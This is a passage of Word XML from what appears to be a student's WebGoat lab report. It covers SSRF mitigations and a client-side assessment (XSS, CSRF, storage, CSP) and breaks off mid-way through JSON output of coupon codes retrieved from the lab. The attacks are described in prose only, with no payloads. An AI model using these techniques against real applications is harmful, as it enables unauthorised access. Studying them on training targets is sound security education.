          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Employ a whitelist approach for validating and restricting allowed resources for server-side requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F22F21" w14:textId="42973A8C" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Educate developers on the risks associated with SSRF attacks and secure coding practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5006FA40" w14:textId="6BF8651E" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Reflection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB4D6E" w14:textId="54BA7EEE" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A96492E" w14:textId="33EA90E5" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The SSRF assessment provided valuable insights into potential vulnerabilities in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> server-side request handling. Future assessments should continue to explore and address such vulnerabilities to enhance overall system security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028249D9" w14:textId="7FCC2868" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B57BF08" w14:textId="68A2E706" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50486E66" w14:textId="587520B4" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C01D65" w14:textId="53609DA8" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Browser Development Tools Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3634531B" w14:textId="360B727F" w:rsidR="00B144C6" w:rsidRPr="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat Project Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C485A3" w14:textId="30213358" w:rsidR="00B144C6" w:rsidRDefault="00B144C6" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B144C6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>OWASP Server-Side Request Forgery (SSRF) Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3714A178" w14:textId="73F8E60A" w:rsidR="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23686DB4" w14:textId="5E4675F1" w:rsidR="00700EFC" w:rsidRDefault="00703354" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E6346EA" wp14:editId="15568519">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>59690</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>7304539</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1346200" cy="1009650"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="287105098" name="Picture 5" descr="A computer screen with a cartoon charact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05098" name="Picture 5" descr="A computer screen with a cartoon character on i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46200" cy="1009650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17310952" w14:textId="287B481B" w:rsidR="00700EFC" w:rsidRDefault="00703354" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AD25ECF" wp14:editId="5781A4B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4386112</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6902818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1813560" cy="1360170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="436020409" name="Picture 8" descr="A computer screen with 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20409" name="Picture 8" descr="A computer screen with a blue and white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13560" cy="13601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3360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53E6B552" wp14:editId="4402D093">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1512570</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>7147292</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1489710" cy="1116330"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="723674633" name="Picture 6" descr="A computer screen with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74633" name="Picture 6" descr="A computer screen with a black and white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9710" cy="1116330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="493FB7FA" w14:textId="1C89EE68" w:rsidR="00700EFC" w:rsidRDefault="00703354" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E6CC83E" wp14:editId="1B37E16A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3006959</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>7214803</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1340485" cy="1005205"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="79497057" name="Picture 7" descr="A computer screen with a messag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7057" name="Picture 7" descr="A computer screen with a message on i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40485" cy="1005205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D4DD3" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6320C8" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00B144C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA8905E" w14:textId="2A8A2C4F" w:rsidR="00700EFC" w:rsidRPr="007A3DB1" w:rsidRDefault="00700EFC" w:rsidP="007A3DB1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3DB1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Client Side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D7E9F" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Exercise Title and Objective: "Client-Side Security Assessment on WebGoat"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CF97F1" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Objective: Evaluate the client-side security measures in WebGoat to identify potential vulnerabilities and assess the overall resilience of the application to client-side attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7804CDE4" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5B9FC2" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Methodology: Utilized browser Developer Tools and examined client-side scripts to assess potential vulnerabilities. Explored </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> client-side functionalities to identify weaknesses and test for common client-side security issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350CBFF3" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452CAB76" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700EFC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Steps Taken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBAB411" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00700EFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9AE716" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00E85A2B" w:rsidRDefault="00700EFC" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Explored </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>WebGoat's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> client-side features to understand the structure and behavior of client-side scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A01AF2" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00E85A2B" w:rsidRDefault="00700EFC" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Leveraged browser Developer Tools to inspect and analyze client-side scripts and requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54369B97" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00E85A2B" w:rsidRDefault="00700EFC" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Tested for Cross-Site Scripting (XSS) vulnerabilities by injecting malicious scripts into user inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFBDC6D" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00E85A2B" w:rsidRDefault="00700EFC" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Examined the handling of client-side storage mechanisms, such as cookies and local storage, for potential security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52442301" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRPr="00E85A2B" w:rsidRDefault="00700EFC" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Assessed the application's resistance to Cross-Site Request Forgery (CSRF) attacks by attempting unauthorized requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFFBC4D" w14:textId="77777777" w:rsidR="00700EFC" w:rsidRDefault="00700EFC" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E85A2B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Explored the use of Content Security Policy (CSP) headers and their effectiveness in mitigating client-side security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF30B4F" w14:textId="0476F542" w:rsidR="007D4E46" w:rsidRDefault="007D4E46" w:rsidP="00E85A2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>Executed a request to retrieve coupon codes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8ABFA5" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E728C3" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  "codes": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27137212" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300BDCFB" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">      "code": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>webgoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522944C0" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">      "discount": 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143F631A" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC99EC1" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DC48CC" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">      "code": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>owasp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E1AF85" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">      "discount": 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6517736E" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB4354D" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6DABDB" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">      "code": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>owasp-webgoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66C514" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">      "discount": 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA365E9" w14:textId="77777777" w:rsidR="007A29AC" w:rsidRPr="007A29AC" w:rsidRDefault="007A29AC" w:rsidP="007A29AC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A29AC">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
